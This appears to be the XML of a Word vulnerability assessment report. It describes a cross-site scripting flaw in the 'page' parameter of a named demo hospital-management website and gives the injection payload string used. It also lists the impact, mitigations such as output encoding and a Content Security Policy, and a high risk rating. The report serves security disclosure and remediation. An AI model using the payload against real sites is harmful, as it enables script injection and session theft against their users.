    <w:p w14:paraId="3A83C166" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRDefault="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="563C25E0" w14:textId="00F10CC6" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C85F2EA" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This vulnerability assessment report aims to highlight a critical security issue discovered on the website hosted at "</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>https://demo.amarhms.com/arch/index.php?page=</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dashboard</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>". The identified vulnerability involves Cross-Site Scripting (XSS), which allows attackers to inject malicious code into the website, potentially compromising its integrity and user data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C4F478" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E363EE" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357D6E1D" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F62168" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Type: </w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286C6893" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Vulnerable URL: "</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://demo.amarhms.com/arch/index.php?page=PAYLOAD</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F4A86A" w14:textId="59379C3F" w:rsidR="00CC50E6" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Payload Used: "</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dashboard'%20--&gt;'&gt;'"</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A57D23" w14:textId="775D4697" w:rsidR="00CC50E6" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC50E6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE85EE1" w14:textId="525BFAD2" w:rsidR="00CC50E6" w:rsidRPr="00CC50E6" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC50E6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DB219CA" wp14:editId="3538FBB8">
            <wp:extent cx="5731510" cy="3298190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1216337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37482" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3298190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EDE29F" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1BA7C2" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Exploiting this vulnerability enables attackers to inject and execute harmful scripts on the website. It poses risks such as unauthorized access to user information, session hijacking, defacement of the website, and further exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FF8796" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57014242" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>To mitigate the XSS vulnerability, the following recommendations are advised:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6657C3BA" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Input Validation and Sanitization: Implement robust validation and sanitization mechanisms for user input fields to prevent the execution of malicious scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFCAA09" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Output Encoding: Apply proper encoding techniques to ensure that user-supplied data is correctly displayed without executing as code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B13F197" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Content Security Policy (CSP): Enforce a Content Security Policy to restrict the execution of scripts from unauthorized sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3727EAEC" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Risk Assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116C3B00" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="008F7EBC" w:rsidRDefault="00CC50E6" w:rsidP="00CC50E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Given the criticality of the XSS vulnerability, it is classified as high risk. Immediate action is recommended to address and remediate this vulnerability, preventing potential exploitation and safeguarding the website and its users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F504A38" w14:textId="77777777" w:rsidR="00CC50E6" w:rsidRPr="00651B72" w:rsidRDefault="00CC50E6" w:rsidP="00651B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CC50E6" w:rsidRPr="00651B72" w:rsidSect="00AA5D8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ED5C" w14:textId="77777777" w:rsidR="009D5D97" w:rsidRDefault="009D5D97" w:rsidP="00AA5D8F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="528DD1EA" w14:textId="77777777" w:rsidR="009D5D97" w:rsidRDefault="009D5D97" w:rsidP="00AA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70CF" w14:textId="77777777" w:rsidR="009D5D97" w:rsidRDefault="009D5D97" w:rsidP="00AA5D8F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0BD3878F" w14:textId="77777777" w:rsidR="009D5D97" w:rsidRDefault="009D5D97" w:rsidP="00AA5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3D4A" w14:textId="42B971DE" w:rsidR="00AA5D8F" w:rsidRDefault="00AA5D8F">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t>06/07/2023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4.25pt;height:14.25pt" o:bullet="t">
        <v:imagedata r:id="rId1" o:title="doubleArrow"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="16F03C15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D6E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1E0D57"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E568778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5140C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7BE6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408227">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2132017814">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="40707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F0"/>
    <w:rsid w:val="00287B08"/>
    <w:rsid w:val="00295632"/>
    <w:rsid w:val="00425351"/>
    <w:rsid w:val="00434237"/>
    <w:rsid w:val="004F0E3E"/>
    <w:rsid w:val="0062121B"/>
    <w:rsid w:val="00651B72"/>
    <w:rsid w:val="008F7EBC"/>
    <w:rsid w:val="00917D7D"/>
    <w:rsid w:val="00927250"/>
    <w:rsid w:val="00995E18"/>
    <w:rsid w:val="009D5D97"/>
    <w:rsid w:val="00AA5D8F"/>
    <w:rsid w:val="00CC50E6"/>
    <w:rsid w:val="00D013F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D99F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6A2F2E0A-BACE-445C-B4D1-F652E074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A5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D8F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA5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D8F"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA5D8F"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA5D8F"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA5D8F"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00AA5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5D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14653">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="-15"/>
      <w:marRight w:val="-15"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1624000238">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="14668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mo.amarhms.com/arch/index.php?page=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AHMED</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SAMI AHMED</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-06T19:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-06T21:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>